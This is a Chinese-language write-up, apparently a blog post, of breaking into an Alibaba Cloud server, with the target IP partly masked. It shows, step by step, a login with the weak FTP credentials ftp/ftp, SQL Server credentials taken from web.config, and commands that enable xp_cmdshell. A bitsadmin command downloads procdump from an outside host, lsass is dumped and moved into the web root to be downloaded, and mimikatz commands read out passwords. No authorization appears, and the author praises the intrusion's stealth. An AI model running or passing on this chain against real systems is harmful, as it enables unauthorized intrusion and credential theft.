前言

無意中遇到ftp弱口令，以為沒什么卵用。沒想到一個小細節(jié)導(dǎo)致服務(wù)器直接搞定。

信息收集

IP為阿里云118.19.xx.xx、開放大量端口21,22,80,81,1433,3389,8888等等

ftp弱口令

指紋識別發(fā)現(xiàn)81端口為serv-u軟件。一個弱口令ftp/ftp直接登錄。原以為ftp用來傳輸文件作用不大，沒想到無意中翻找到了web.config的敏感文件。

image.png

打開很明顯看到sql server的配置信息。

image.png

mssql命令執(zhí)行

開啟xp_cmdshell組件

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

直接執(zhí)行系統(tǒng)命令

exec master.dbo.xp_cmdshell  'whoami';

image.png

因為阿里云服務(wù)器的原因，想著直接激活guest用戶，結(jié)果在添加到管理員組的時候并沒有成功。查看進程，發(fā)現(xiàn)存在防護aliyundun.exe

image.png

那采用prodump導(dǎo)出lsass.dmp，然后從web下載到本地，再使用mimikatz讀取密碼。
此時有一個問題，web的絕對路徑還不知道。

web路徑查找

該IP的8888端口正常運行著web服務(wù)，為一login.aspx登錄地址。
dir搜索logon.aspx

exec master.dbo.xp_cmdshell  'cd /d E: && dir /b /s Logon.aspx'

image.png

找到網(wǎng)站絕對路徑，就簡單啦~

dump hash

從公網(wǎng)上下載prodump.exe下載到靶機上。

exec master.dbo.xp_cmdshell  'bitsadmin /transfer myDownLoadJob /download /priority normal "http://144.34.xxx.xxx/procdump64.exe" "C:\\Windows\\system32\\procdump.exe"'

procdump.exe -accepteula -ma lsass.exe lsass.dmp

導(dǎo)出lsass.dmp

image.png

再copy lsass.dmp到網(wǎng)站根目錄下。需要重命名為txt后綴名。

exec master.dbo.xp_cmdshell  'copy lsass.dmp "E:\Program Files\DESS.Web\tmp.txt"'

需要注意的是：
因為windows文件夾名稱中間沒有空格，如果文件夾名（或者目錄名）中有空格，就必須加雙引號了
訪問tmp.txt下載。然后本地的mimikatz讀取即可。

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

image.png

總結(jié)

不要放過任何一個細節(jié)。而且這次成功滲透，我發(fā)現(xiàn)全程以靜默化狀態(tài)運行，沒有掛馬，沒有惡意掃描。